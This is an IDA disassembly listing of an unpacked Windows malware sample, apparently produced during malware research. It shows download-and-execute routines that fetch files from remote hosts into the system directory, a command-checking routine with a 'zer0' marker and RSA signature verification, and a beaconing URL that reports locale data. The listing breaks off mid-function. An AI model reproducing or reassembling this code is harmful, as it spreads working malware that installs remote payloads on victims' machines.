;
; +-------------------------------------------------------------------------+
; |	This file is generated by The Interactive Disassembler (IDA)	    |
; |	Copyright (c) 2007 by DataRescue sa/nv,	<ida@datarescue.com>	    |
; |		  Licensed to: SRI, 1 computer,	std, 05/2007		    |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; |	This file is generated by The Interactive Disassembler (IDA)	    |
; |	Copyright (c) 2007 by DataRescue sa/nv,	<ida@datarescue.com>	    |
; |		  Licensed to: SRI, 1 computer,	std, 05/2007		    |
; +-------------------------------------------------------------------------+
;
; Input	MD5   :	AF80774623FD1587D7BE6A2ECE9646E3

; File Name   :	u:\work\af80774623fd1587d7be6a2ece9646e3_unpacked.exe
; Format      :	Portable executable for	80386 (PE)
; Imagebase   :	31420000
; Section 1. (virtual address 00001000)
; Virtual size			: 00005000 (  20480.)
; Section size in file		: 00005000 (  20480.)
; Offset to raw	data for section: 00001000
; Flags	E0000080: Bss Executable Readable Writable
; Alignment	: default


unicode		macro page,string,zero
		irpc c,<string>
		db '&c', page
		endm
		ifnb <zero>
		dw zero
		endif
endm

		.686p
		.mmx
		.model flat

; ===========================================================================

; Segment type:	Pure code
; Segment permissions: Read/Write/Execute
UPX0		segment	para public 'CODE' use32
		assume cs:UPX0
		;org 31421000h
		assume es:nothing, ss:nothing, ds:UPX0,	fs:nothing, gs:nothing
dword_31421000	dd 77DD590Bh		; DATA XREF: sub_314228DB+1Ar
dword_31421004	dd 77DD59F0h		; DATA XREF: sub_314228DB+38r
dword_31421008	dd 77DD23D7h		; DATA XREF: sub_31422882+3Er
dword_3142100C	dd 77DD22EAh		; DATA XREF: sub_3142284D+14r
					; sub_31422882+1Dr
dword_31421010	dd 77DD5C55h		; DATA XREF: sub_3142284D+24r
dword_31421014	dd 77DD189Ah		; DATA XREF: sub_3142284D+2Dr
					; sub_31422882+4Er ...
dword_31421018	dd 77E2A571h		; DATA XREF: sub_314223B2+17Dr
dword_3142101C	dd 77DE089Eh		; DATA XREF: sub_3142179A+17r
dword_31421020	dd 77DE07A3h		; DATA XREF: sub_3142179A+30r
dword_31421024	dd 77DE0D79h		; DATA XREF: sub_3142179A+4Dr
dword_31421028	dd 77DE0343h		; DATA XREF: sub_3142179A+5Br
dword_3142102C	dd 77DE0AF0h		; DATA XREF: sub_3142177E+8r
dword_31421030	dd 77DE042Eh		; DATA XREF: sub_3142177E+12r
dword_31421034	dd 77DDEBA2h		; DATA XREF: sub_3142172F+6r
dword_31421038	dd 77DE0BB2h		; DATA XREF: sub_3142172F+3Dr
		align 10h
dword_31421040	dd 77E79E34h		; DATA XREF: sub_31422CB9+Br
dword_31421044	dd 77E7980Ah		; DATA XREF: sub_31422CA5+Dr
dword_31421048	dd 77E7A099h		; DATA XREF: sub_31422B67+17r
dword_3142104C	dd 77E76A2Eh		; DATA XREF: sub_31422B67+E9r
dword_31421050	dd 77E6BD13h		; DATA XREF: sub_31422A9B+71r
dword_31421054	dd 77E684C6h		; DATA XREF: sub_31422A9B+B0r
dword_31421058	dd 77EBB1E7h		; DATA XREF: sub_31422D2Cr
dword_3142105C	dd 77EBA595h		; DATA XREF: sub_31422D26r
dword_31421060	dd 77E616B4h		; DATA XREF: sub_3142292E+9Br
dword_31421064	dd 77EBA6E9h		; DATA XREF: sub_31422D20r
dword_31421068	dd 77E73167h		; DATA XREF: sub_31422712+13r
					; sub_31422B67+8Fr
dword_3142106C	dd 77E737DEh		; DATA XREF: sub_314223B2+C8r
dword_31421070	dd 77E79D5Bh		; DATA XREF: sub_3142239E+8r
dword_31421074	dd 77E73628h		; DATA XREF: UPX0:31422346r
					; sub_31422A9B+Fr
dword_31421078	dd 77E79D8Ch		; DATA XREF: sub_314211A0+EDr
dword_3142107C	dd 77E77963h		; DATA XREF: sub_314211A0+B9r
					; sub_314211A0+F6r ...
dword_31421080	dd 77E7A837h		; DATA XREF: sub_314211A0+8Fr
					; sub_314221C4+57r
dword_31421084	dd 77E74672h		; DATA XREF: sub_314211A0+5Ar
					; sub_31421422+64r ...
dword_31421088	dd 77E74155h		; DATA XREF: sub_314211A0+3Dr
					; sub_31422A9B+40r
dword_3142108C	dd 77E704FCh		; DATA XREF: sub_314211A0+37r
					; sub_31422A9B+1Br
dword_31421090	dd 77E7513Ch		; DATA XREF: sub_314215C7+29r
dword_31421094	dd 77E61BE6h		; DATA XREF: sub_314216A2+7Dr
					; sub_31421801+16Cr ...
dword_31421098	dd 77E775F1h		; DATA XREF: sub_314216A2+1r
dword_3142109C	dd 77E73BEFh		; DATA XREF: sub_31421801+4Fr
dword_314210A0	dd 77E79C90h		; DATA XREF: sub_31421D68+4Dr
dword_314210A4	dd 77E7A5FDh		; DATA XREF: sub_31421D68+13r
					; sub_31421DF0+2Cr
dword_314210A8	dd 77E805D8h		; DATA XREF: sub_31421D68+Dr
					; sub_314223B2+116r
dword_314210AC	dd 77E61A90h		; DATA XREF: sub_31421DF0+BCr
dword_314210B0	dd 77E706B7h		; DATA XREF: sub_31421DF0+8Ar
					; sub_3142292E+92r
dword_314210B4	dd 77E79F93h		; DATA XREF: sub_31421DF0+26r
					; UPX0:31422336r
dword_314210B8	dd 77E7751Ah		; DATA XREF: sub_31421EFB+12r
dword_314210BC	dd 77E7C2C4h		; DATA XREF: sub_31421F29+8r
dword_314210C0	dd 77E7AC37h		; DATA XREF: sub_31421F38+12r
					; sub_31421F52+12r
dword_314210C4	dd 77E61BB8h		; DATA XREF: sub_31421FA3+38r
dword_314210C8	dd 77E74A3Bh		; DATA XREF: sub_3142204E+13r
dword_314210CC	dd 77E73AB3h		; DATA XREF: sub_3142204E+8r
dword_314210D0	dd 77E73C49h		; DATA XREF: sub_3142207E+137r
					; sub_314221C4+66r ...
dword_314210D4	dd 77E777EFh		; DATA XREF: sub_3142207E+F4r
					; sub_314225C3+3Fr ...
dword_314210D8	dd 77E78B82h		; DATA XREF: sub_314221C4+92r
dword_314210DC	dd 77E793EFh		; DATA XREF: sub_314221C4+6Er
dword_314210E0	dd 77E75CB5h		; DATA XREF: UPX0:31422370r
					; sub_31422A9B+C3r
dword_314210E4	dd 77F5157Dh, 0		; DATA XREF: UPX0:31422361r
dword_314210EC	dd 77C35280h		; DATA XREF: sub_31421EFB+22r
dword_314210F0	dd 77C42E10h		; DATA XREF: sub_31422CE2r
dword_314210F4	dd 77C43710h		; DATA XREF: sub_31422CDCr
dword_314210F8	dd 77C43490h		; DATA XREF: sub_31422CD6r
dword_314210FC	dd 77C3528Dh		; DATA XREF: sub_314216A2:loc_314216FCr
					; sub_31421F73:loc_31421F84r ...
; ---------------------------------------------------------------------------


loc_31421100:				; DATA XREF: UPX0:loc_31422CD0r
		mov	al, 3Eh
		retn
; ---------------------------------------------------------------------------
		db 77h
dword_31421104	dd 77C43AB0h		; DATA XREF: sub_31421422+3Cr
					; sub_3142207E:loc_314220AFr ...
dword_31421108	dd 77C43500h		; DATA XREF: sub_31421316+37r
					; sub_31421422+AAr
		align 10h
dword_31421110	dd 77D4BDCAh		; DATA XREF: sub_31421DF0+5Dr
dword_31421114	dd 77D4456Bh		; DATA XREF: sub_31421DF0+67r
dword_31421118	dd 77D45CBCh		; DATA XREF: sub_31421DF0+7Ar
dword_3142111C	dd 77D4C96Ah		; DATA XREF: sub_314215C7+5Dr
					; sub_314215C7+77r ...
		dd 0
dword_31421124	dd 76214750h		; DATA XREF: sub_314211A0+A9r
					; sub_314215C7+9Dr
dword_31421128	dd 7620AFB6h		; DATA XREF: sub_314211A0+18r
					; sub_314215C7+89r
dword_3142112C	dd 76204E4Dh		; DATA XREF: sub_314215C7+C5r
dword_31421130	dd 762211EFh		; DATA XREF: sub_31422038+8r
					; UPX0:314227A2r
dword_31421134	dd 7620BD61h		; DATA XREF: sub_314211A0+DBr
					; sub_314215C7+B0r
		dd 0
dword_3142113C	dd 71AB41DAh		; DATA XREF: sub_31422308+10r
dword_31421140	dd 71AB3ECEh		; DATA XREF: sub_314221C4+100r
dword_31421144	dd 71AB5DE2h		; DATA XREF: sub_314221C4+10Dr
dword_31421148	dd 71AB868Dh		; DATA XREF: sub_314221C4+120r
dword_3142114C	dd 71AB32CAh		; DATA XREF: sub_31421FF9+Cr
dword_31421150	dd 71AB1740h		; DATA XREF: sub_31421FF9+17r
dword_31421154	dd 71AB2BBFh		; DATA XREF: sub_31421FF9+25r
dword_31421158	dd 71AB3C22h		; DATA XREF: sub_31421801+2Br
					; sub_314221C4+ACr
dword_3142115C	dd 71AB401Ch		; DATA XREF: sub_31421801+44r
					; sub_31422712+Dr
dword_31421160	dd 71AB1746h		; DATA XREF: sub_31421801+147r
					; sub_314221C4+F0r
dword_31421164	dd 71AB3E5Dh		; DATA XREF: sub_31421801+15Dr
dword_31421168	dd 71AB1AF4h		; DATA XREF: sub_31421801+17Br
					; sub_3142207E+67r ...
dword_3142116C	dd 71AB5690h		; DATA XREF: sub_31421801+1A4r
					; sub_31421801+1D8r ...
dword_31421170	dd 71AB8629h		; DATA XREF: sub_31421801+550r
					; sub_3142207E+128r
dword_31421174	dd 71AB1A6Dh		; DATA XREF: sub_31421801+559r
					; sub_3142207E+12Fr
		align 10h
dword_31421180	dd 0FFFFFFFFh, 0	; DATA XREF: sub_31421422+5o
		dd offset nullsub_1
		align 10h
dword_31421190	dd 0FFFFFFFFh, 0	; DATA XREF: sub_314223B2+5o
		dd offset nullsub_2
		align 10h

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_314211A0	proc near		; CODE XREF: sub_31421422+16Dp

var_110		= byte ptr -110h
var_C		= byte ptr -0Ch
var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_0		= dword	ptr  8

		push	ebp
		mov	ebp, esp
		sub	esp, 110h
		push	ebx
		push	esi
		xor	esi, esi
		push	edi
		push	esi
		push	esi
		push	esi
		push	1
		push	offset aMozilla4_0Comp ; "Mozilla/4.0 (compatible; MSIE	6.0; Wind"...
		call	dword_31421128	; InternetOpenA
		mov	ebx, eax
		cmp	ebx, esi
		jnz	short loc_314211CB
		push	1
		jmp	loc_31421261
; ---------------------------------------------------------------------------


loc_314211CB:				; CODE XREF: sub_314211A0+22j
		lea	eax, [ebp+var_110]
		push	104h
		push	eax
		call	dword_3142108C	; GetSystemDirectoryA
		mov	edi, dword_31421088
		lea	eax, [ebp+var_110]
		push	offset dword_314241F8
		push	eax
		call	edi	; lstrcat
		lea	eax, [ebp+var_110]
		push	6
		push	eax
		call	dword_31421084	; lstrlen
		lea	eax, [ebp+eax+var_110]
		push	eax
		call	sub_31421F73
		pop	ecx
		lea	eax, [ebp+var_110]
		pop	ecx
		push	offset dword_314241F0
		push	eax
		call	edi	; lstrcat
		push	esi
		push	esi
		push	2
		push	esi
		push	esi
		lea	eax, [ebp+var_110]
		push	40000000h
		push	eax
		call	dword_31421080	; CreateFileA
		cmp	eax, 0FFFFFFFFh
		mov	[ebp+var_4], eax
		jnz	short loc_31421241
		push	2
		jmp	short loc_31421261
; ---------------------------------------------------------------------------


loc_31421241:				; CODE XREF: sub_314211A0+9Bj
		push	esi
		push	esi
		push	esi
		push	esi
		push	[ebp+arg_0]
		push	ebx
		call	dword_31421124	; InternetOpenUrlA
		cmp	eax, esi
		mov	[ebp+arg_0], eax
		jnz	short loc_31421264
		push	[ebp+var_4]
		call	dword_3142107C	; CloseHandle
		push	3


loc_31421261:				; CODE XREF: sub_314211A0+26j
					; sub_314211A0+9Fj
		pop	eax
		jmp	short loc_314212B5
; ---------------------------------------------------------------------------


loc_31421264:				; CODE XREF: sub_314211A0+B4j
		mov	edi, 100000h
		push	edi
		call	sub_31422CA5
		mov	ebx, eax
		pop	ecx
		lea	eax, [ebp+var_8]
		push	eax
		push	edi
		push	ebx
		push	[ebp+arg_0]
		call	dword_31421134	; InternetReadFile
		lea	eax, [ebp+var_C]
		push	esi
		push	eax
		push	[ebp+var_8]
		push	ebx
		push	[ebp+var_4]
		call	dword_31421078	; WriteFile
		push	[ebp+var_4]
		call	dword_3142107C	; CloseHandle
		lea	eax, [ebp+var_110]
		push	5
		push	eax
		call	sub_31421FA3
		push	ebx
		call	sub_31422CB9
		add	esp, 0Ch
		xor	eax, eax


loc_314212B5:				; CODE XREF: sub_314211A0+C2j
		pop	edi
		pop	esi
		pop	ebx
		leave
		retn
sub_314211A0	endp


; =============== S U B	R O U T	I N E =======================================



sub_314212BA	proc near		; CODE XREF: sub_31421422+F8p

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8
arg_8		= byte ptr  0Ch

		mov	ecx, [esp+arg_4]
		mov	eax, [esp+arg_0]
		push	ebx
		push	esi
		push	edi
		or	edi, 0FFFFFFFFh
		inc	eax
		push	0Fh
		lea	esi, [ecx+1]
		sub	edi, ecx
		pop	ecx


loc_314212D1:				; CODE XREF: sub_314212BA+56j
		mov	dl, [eax]
		mov	bl, [eax-1]
		add	edx, ecx
		add	bl, cl
		sar	edx, 4
		and	dl, 3
		sub	dl, [esp+0Ch+arg_8]
		shl	bl, 2
		or	dl, bl
		mov	[esi-1], dl
		mov	dl, [eax+1]
		mov	bl, [eax]
		dec	dl
		add	bl, cl
		and	dl, cl
		sub	dl, [esp+0Ch+arg_8]
		add	eax, 3
		shl	bl, 4
		and	bl, 0F0h
		or	dl, bl
		mov	[esi], dl
		inc	esi
		inc	esi
		lea	edx, [edi+esi]
		cmp	edx, 30h
		jl	short loc_314212D1
		pop	edi
		pop	esi
		pop	ebx
		retn
sub_314212BA	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_31421316	proc near		; CODE XREF: sub_3142139B+27p

var_38		= byte ptr -38h
var_1C		= byte ptr -1Ch
arg_0		= byte ptr  8
arg_4		= dword	ptr  0Ch

		push	ebp
		mov	ebp, esp
		sub	esp, 38h
		push	ebx
		push	esi
		push	edi
		push	6
		pop	ecx
		mov	esi, offset aAbcdefghijklmn ; "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
		lea	edi, [ebp+var_1C]
		push	6
		rep movsd
		movsw
		movsb
		pop	ecx
		mov	esi, offset aAbcdefghijkl_0 ; "abcdefghijklmnopqrstuvwxyz"
		lea	edi, [ebp+var_38]
		mov	ebx, [ebp+arg_4]
		rep movsd
		movsw
		test	ebx, ebx
		movsb
		jge	short loc_31421349
		add	ebx, 1Ah


loc_31421349:				; CODE XREF: sub_31421316+2Ej
		movsx	edi, [ebp+arg_0]
		mov	esi, dword_31421108
		lea	eax, [ebp+var_1C]
		push	edi
		push	eax
		call	esi	; strchr
		pop	ecx
		test	eax, eax
		pop	ecx
		jz	short loc_31421373
		lea	ecx, [ebp+var_1C]
		push	1Ah
		sub	eax, ecx
		pop	ecx
		add	eax, ebx
		cdq
		idiv	ecx
		mov	al, [ebp+edx+var_1C]
		jmp	short loc_31421396
; ---------------------------------------------------------------------------


loc_31421373:				; CODE XREF: sub_31421316+48j
		lea	eax, [ebp+var_38]
		push	edi
		push	eax
		call	esi	; strchr
		pop	ecx
		test	eax, eax
		pop	ecx
		jz	short loc_31421393
		lea	ecx, [ebp+var_38]
		push	1Ah
		sub	eax, ecx
		pop	ecx
		add	eax, ebx
		cdq
		idiv	ecx
		mov	al, [ebp+edx+var_38]
		jmp	short loc_31421396
; ---------------------------------------------------------------------------


loc_31421393:				; CODE XREF: sub_31421316+68j
		mov	al, [ebp+arg_0]


loc_31421396:				; CODE XREF: sub_31421316+5Bj
					; sub_31421316+7Bj
		pop	edi
		pop	esi
		pop	ebx
		leave
		retn
sub_31421316	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_3142139B	proc near		; CODE XREF: sub_31421422+D6p

arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h

		push	ebp
		mov	ebp, esp
		mov	eax, [ebp+arg_4]
		push	esi
		mov	esi, [ebp+arg_8]
		push	edi
		mov	al, [eax]
		test	al, al
		jz	short loc_314213F8
		mov	edi, [ebp+arg_0]
		push	ebx


loc_314213B0:				; CODE XREF: sub_3142139B+58j
		sub	al, 2
		inc	[ebp+arg_4]
		mov	bl, al
		mov	eax, esi
		neg	eax
		mov	byte ptr [ebp+arg_0], bl
		push	eax
		push	[ebp+arg_0]
		call	sub_31421316
		mov	[edi], al
		pop	ecx
		inc	edi
		cmp	bl, 61h
		pop	ecx
		jl	short loc_314213DC
		cmp	bl, 7Ah
		jg	short loc_314213DC
		movsx	esi, bl
		sub	esi, 61h


loc_314213DC:				; CODE XREF: sub_3142139B+34j
					; sub_3142139B+39j
		cmp	bl, 41h
		jl	short loc_314213EC
		cmp	bl, 5Ah
		jg	short loc_314213EC
		movsx	esi, bl
		sub	esi, 41h


loc_314213EC:				; CODE XREF: sub_3142139B+44j
					; sub_3142139B+49j
		mov	eax, [ebp+arg_4]
		mov	al, [eax]
		test	al, al
		jnz	short loc_314213B0
		pop	ebx
		jmp	short loc_314213FB
; ---------------------------------------------------------------------------


loc_314213F8:				; CODE XREF: sub_3142139B+Fj
		mov	edi, [ebp+arg_0]


loc_314213FB:				; CODE XREF: sub_3142139B+5Bj
		and	byte ptr [edi],	0
		pop	edi
		pop	esi
		pop	ebp
		retn
sub_3142139B	endp


; =============== S U B	R O U T	I N E =======================================



sub_31421402	proc near		; CODE XREF: sub_31421422+104p

arg_0		= dword	ptr  4

		xor	eax, eax
		xor	ecx, ecx


loc_31421406:				; CODE XREF: sub_31421402+12j
		mov	edx, [esp+arg_0]
		movzx	edx, byte ptr [ecx+edx]
		add	eax, edx
		inc	ecx
		cmp	ecx, 30h
		jl	short loc_31421406
		push	1Ah
		cdq
		pop	ecx
		idiv	ecx
		mov	eax, edx
		add	eax, 61h
		retn
sub_31421402	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_31421422	proc near		; CODE XREF: sub_314215C7+BAp

var_174		= dword	ptr -174h
var_170		= byte ptr -170h
var_168		= byte ptr -168h
var_164		= byte ptr -164h
var_134		= dword	ptr -134h
var_130		= dword	ptr -130h
var_12C		= dword	ptr -12Ch
var_128		= dword	ptr -128h
var_124		= byte ptr -124h
var_11C		= byte ptr -11Ch
var_1C		= dword	ptr -1Ch
var_10		= dword	ptr -10h
var_4		= dword	ptr -4
arg_0		= dword	ptr  8

		push	ebp
		mov	ebp, esp
		push	0FFFFFFFFh
		push	offset dword_31421180
		push	offset loc_31422CD0
		mov	eax, large fs:0
		push	eax
		mov	large fs:0, esp
		sub	esp, 164h
		push	ebx
		push	esi
		push	edi
		mov	[ebp+var_128], 1
		and	[ebp+var_4], 0
		push	offset aZer0	; "zer0"
		push	[ebp+arg_0]
		call	dword_31421104	; strstr
		pop	ecx
		pop	ecx
		mov	edi, eax
		mov	[ebp+var_130], edi
		test	edi, edi
		jz	loc_314215A8
		add	edi, 4
		mov	[ebp+var_130], edi
		jz	loc_314215A8
		push	edi
		call	dword_31421084	; lstrlen
		mov	[ebp+var_1C], eax
		cmp	eax, 50h
		jle	loc_314215A8
		and	byte ptr [edi+100h], 0
		mov	al, [edi]
		mov	[ebp+var_168], al
		movsx	ebx, al
		sub	ebx, 61h
		mov	[ebp+var_12C], ebx
		js	loc_314215A8
		cmp	ebx, 1Ah
		jge	loc_314215A8
		inc	edi
		mov	[ebp+var_130], edi
		push	7Eh
		push	edi
		call	dword_31421108	; strchr
		pop	ecx
		pop	ecx
		mov	esi, eax
		mov	[ebp+var_134], esi
		test	esi, esi
		jz	loc_314215A8
		mov	al, [esi]
		mov	[ebp+var_170], al
		and	byte ptr [esi],	0
		push	ebx
		push	edi
		lea	eax, [ebp+var_11C]
		push	eax
		call	sub_3142139B
		mov	al, [ebp+var_170]
		mov	[esi], al
		inc	esi
		mov	[ebp+var_130], esi
		xor	edi, edi
		push	edi
		lea	eax, [ebp+var_164]
		push	eax
		lea	eax, [esi+1]
		push	eax
		call	sub_314212BA
		lea	eax, [ebp+var_164]
		push	eax
		call	sub_31421402
		add	esp, 1Ch
		cmp	[esi], al
		jnz	short loc_314215A8
		push	44h
		push	offset dword_31424000
		lea	eax, [ebp+var_124]
		push	eax
		call	sub_3142172F
		add	esp, 0Ch
		lea	eax, [ebp+var_174]
		push	eax
		push	30h
		lea	eax, [ebp+var_164]
		push	eax
		lea	eax, [ebp+var_11C]
		push	eax
		call	dword_31421084	; lstrlen
		push	eax
		lea	eax, [ebp+var_11C]
		push	eax
		lea	eax, [ebp+var_124]
		push	eax
		call	sub_3142179A
		add	esp, 18h
		test	eax, eax
		jnz	short loc_3142159B
		cmp	[ebp+var_174], edi
		jz	short loc_3142159B
		lea	eax, [ebp+var_11C]
		push	eax
		call	sub_314211A0
		pop	ecx
		mov	[ebp+var_128], edi


loc_3142159B:				; CODE XREF: sub_31421422+15Cj
					; sub_31421422+164j
		lea	eax, [ebp+var_124]
		push	eax
		call	sub_3142177E
		pop	ecx


loc_314215A8:				; CODE XREF: sub_31421422+4Ej
					; sub_31421422+5Dj ...
		or	[ebp+var_4], 0FFFFFFFFh
		call	nullsub_1
		mov	eax, [ebp+var_128]
		mov	ecx, [ebp+var_10]
		mov	large fs:0, ecx
		pop	edi
		pop	esi
		pop	ebx
		leave
		retn
sub_31421422	endp

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_1. PRESS KEYPAD "+" TO EXPAND]

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_314215C7	proc near		; CODE XREF: sub_314216A2+2Ap

var_E8		= byte ptr -0E8h
var_84		= byte ptr -84h
var_4		= byte ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch

		push	ebp
		mov	ebp, esp
		sub	esp, 0E8h
		push	ebx
		push	esi
		push	edi
		push	4000h
		call	sub_31422CA5
		pop	ecx
		mov	esi, eax
		lea	eax, [ebp+var_E8]
		push	63h
		push	eax
		push	7
		push	400h
		call	dword_31421090	; GetLocaleInfoA
		xor	ebx, ebx
		cmp	byte ptr [ebp+arg_4], bl
		jz	short loc_3142162F
		lea	eax, [ebp+var_E8]
		push	eax
		lea	eax, [ebp+var_84]
		push	dword_31424FEC
		push	dword_31425004
		push	offset aKjszoscitbkggy ; "kjszoscitbkggyijpu"
		push	[ebp+arg_0]
		push	offset aHttpSIndex_php ; "http://%s/index.php?id=%s&scn=%d&inf=%d"...
		push	eax
		call	dword_3142111C	; wsprintfA
		add	esp, 1Ch
		jmp	short loc_31421647
; ---------------------------------------------------------------------------


loc_3142162F:				; CODE XREF: sub_314215C7+34j
		push	[ebp+arg_0]
		lea	eax, [ebp+var_84]
		push	offset aHttpS	; "http://%s"
		push	eax
		call	dword_3142111C	; wsprintfA
		add	esp, 0Ch


loc_31421647:				; CODE XREF: sub_314215C7+66j
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		push	offset aMozilla4_0Co_0 ; "Mozilla/4.0 (compatible; MSIE	6.0; Wind"...
		call	dword_31421128	; InternetOpenA
		push	ebx
		mov	edi, eax
		push	ebx
		push	ebx
		lea	eax, [ebp+var_84]
		push	ebx
		push	eax
		push	edi
		call	dword_31421124	; InternetOpenUrlA
		mov	ebx, eax
		lea	eax, [ebp+var_4]
		push	eax
		push	2000h
		push	esi
		push	ebx
		call	dword_31421134	; InternetReadFile
		push	esi
		mov	[ebp+arg_4], eax
		call	sub_31421422
		push	esi
		call	sub_31422CB9
		mov	esi, dword_3142112C
		pop	ecx
		pop	ecx
		push	ebx
		call	esi	; InternetCloseHandle
		push	edi
		call	esi	; InternetCloseHandle
		mov	eax, [ebp+arg_4]
		pop	edi
		pop	esi
		pop	ebx
		leave
		retn
sub_314215C7	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: noreturn


sub_314216A2	proc near		; DATA XREF: sub_314223B2+15Bo
		push	ebx
		mov	ebx, dword_31421098
		push	esi
		push	edi


loc_314216AB:				; CODE XREF: sub_314216A2+88j
		xor	esi, esi
		mov	edi, 46021h


loc_314216B2:				; CODE XREF: sub_314216A2+86j
		inc	esi
		inc	esi
		call	sub_31422038
		test	eax, eax
		jz	short loc_314216FC
		mov	al, byte_31424080[esi+esi*4]
		push	eax
		push	off_31424081[esi+esi*4]
		call	sub_314215C7
		or	eax, edi
		pop	ecx
		xor	eax, 8064h
		pop	ecx
		shl	eax, 3
		mov	edi, eax
		xor	eax, 228h
		test	ax, 0FFFFh
		jnz	short loc_314216FC
		push	0
		push	offset dword_31425004
		call	ebx	; InterlockedExchange
		push	0
		push	offset dword_31424FEC
		call	ebx	; InterlockedExchange


loc_314216FC:				; CODE XREF: sub_314216A2+19j
					; sub_314216A2+46j
		call	dword_314210FC	; rand
		push	3
		cdq
		pop	ecx
		idiv	ecx
		add	esi, edx
		call	sub_31422068
		xor	edx, edx
		mov	ecx, 493E0h
		div	ecx
		add	edx, 61B48h
		push	edx
		call	dword_31421094	; Sleep
		cmp	esi, 16h
		jb	short loc_314216B2
		jmp	loc_314216AB
sub_314216A2	endp


; =============== S U B	R O U T	I N E =======================================



sub_3142172F	proc near		; CODE XREF: sub_31421422+11Ep

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8
arg_8		= dword	ptr  0Ch

		push	ebx
		mov	ebx, [esp+4+arg_0]
		push	esi
		mov	esi, dword_31421034
		push	edi
		xor	edi, edi
		push	edi
		push	1
		push	edi
		push	edi
		push	ebx
		call	esi	; CryptAcquireContextA
		test	eax, eax
		jnz	short loc_3142175C
		push	8
		push	1
		push	edi
		push	edi
		push	ebx
		call	esi	; CryptAcquireContextA
		test	eax, eax
		jnz	short loc_3142175C
		push	1
		pop	eax
		jmp	short loc_3142177A
; ---------------------------------------------------------------------------


loc_3142175C:				; CODE XREF: sub_3142172F+19j
					; sub_3142172F+26j
		lea	eax, [ebx+4]
		push	eax
		push	edi
		push	edi
		push	[esp+18h+arg_8]
		push	[esp+1Ch+arg_4]
		push	dword ptr [ebx]
		call	dword_31421038	; CryptImportKey
		neg	eax
		sbb	eax, eax
		and	al, 0FEh
		inc	eax
		inc	eax


loc_3142177A:				; CODE XREF: sub_3142172F+2Bj
		pop	edi
		pop	esi
		pop	ebx
		retn
sub_3142172F	endp


; =============== S U B	R O U T	I N E =======================================



sub_3142177E	proc near		; CODE XREF: sub_31421422+180p

arg_0		= dword	ptr  4

		push	esi
		mov	esi, [esp+4+arg_0]
		push	dword ptr [esi+4]
		call	dword_3142102C	; CryptDestroyKey
		push	0
		push	dword ptr [esi]
		call	dword_31421030	; CryptReleaseContext
		xor	eax, eax
		pop	esi
		retn
sub_3142177E	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_3142179A	proc near		; CODE XREF: sub_31421422+152p

arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h
arg_10		= dword	ptr  18h
arg_14		= dword	ptr  1Ch

		push	ebp
		mov	ebp, esp
		push	esi
		mov	esi, [ebp+arg_0]
		push	edi
		lea	eax, [ebp+arg_0]
		xor	edi, edi
		push	eax
		push	edi
		push	edi
		push	8003h
		push	dword ptr [esi]
		call	dword_3142101C	; CryptCreateHash
		test	eax, eax
		jnz	short loc_314217C0
		push	1
		pop	eax
		jmp	short loc_314217FD
; ---------------------------------------------------------------------------


loc_314217C0:				; CODE XREF: sub_3142179A+1Fj
		push	edi
		push	[ebp+arg_8]
		push	[ebp+arg_4]
		push	[ebp+arg_0]
		call	dword_31421020	; CryptHashData
		test	eax, eax
		jnz	short loc_314217D9
		push	2
		pop	edi
		jmp	short loc_314217F2
; ---------------------------------------------------------------------------


loc_314217D9:				; CODE XREF: sub_3142179A+38j
		push	edi
		push	edi
		push	dword ptr [esi+4]
		push	[ebp+arg_10]
		push	[ebp+arg_C]
		push	[ebp+arg_0]
		call	dword_31421024	; CryptVerifySignatureA
		mov	ecx, [ebp+arg_14]
		mov	[ecx], eax


loc_314217F2:				; CODE XREF: sub_3142179A+3Dj
		push	[ebp+arg_0]
		call	dword_31421028	; CryptDestroyHash
		mov	eax, edi


loc_314217FD:				; CODE XREF: sub_3142179A+24j
		pop	edi
		pop	esi
		pop	ebp
		retn
sub_3142179A	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_31421801	proc near		; CODE XREF: sub_3142255F+36p
					; sub_314225C3+48p ...

var_89E4	= byte ptr -89E4h
var_897C	= byte ptr -897Ch
var_690C	= byte ptr -690Ch
var_689C	= byte ptr -689Ch
var_5DD8	= byte ptr -5DD8h
var_4834	= byte ptr -4834h
var_4833	= byte ptr -4833h
var_37A0	= byte ptr -37A0h
var_2CDC	= byte ptr -2CDCh
var_2CDB	= byte ptr -2CDBh
var_2CD8	= byte ptr -2CD8h
var_24F4	= byte ptr -24F4h
var_24E4	= byte ptr -24E4h
var_21C0	= byte ptr -21C0h
var_21BC	= byte ptr -21BCh
var_21B0	= byte ptr -21B0h
var_1F28	= byte ptr -1F28h
var_1EAC	= byte ptr -1EACh
var_16DC	= byte ptr -16DCh
var_1231	= byte ptr -1231h
var_F44		= byte ptr -0F44h
var_EA4		= byte ptr -0EA4h
var_798		= dword	ptr -798h
var_788		= byte ptr -788h
var_774		= byte ptr -774h
var_730		= byte ptr -730h
var_134		= byte ptr -134h
var_133		= byte ptr -133h
var_E4		= byte ptr -0E4h
var_E1		= byte ptr -0E1h
var_B7		= byte ptr -0B7h
var_B5		= byte ptr -0B5h
var_B4		= byte ptr -0B4h
var_6C		= byte ptr -6Ch
var_4C		= byte ptr -4Ch
var_24		= word ptr -24h
var_22		= word ptr -22h
var_20		= dword	ptr -20h
var_14		= dword	ptr -14h
var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch
var_6		= byte ptr -6
var_5		= byte ptr -5
var_4		= dword	ptr -4
arg_0		= dword	ptr  8

		push	ebp
		mov	ebp, esp
		mov	eax, 89E4h
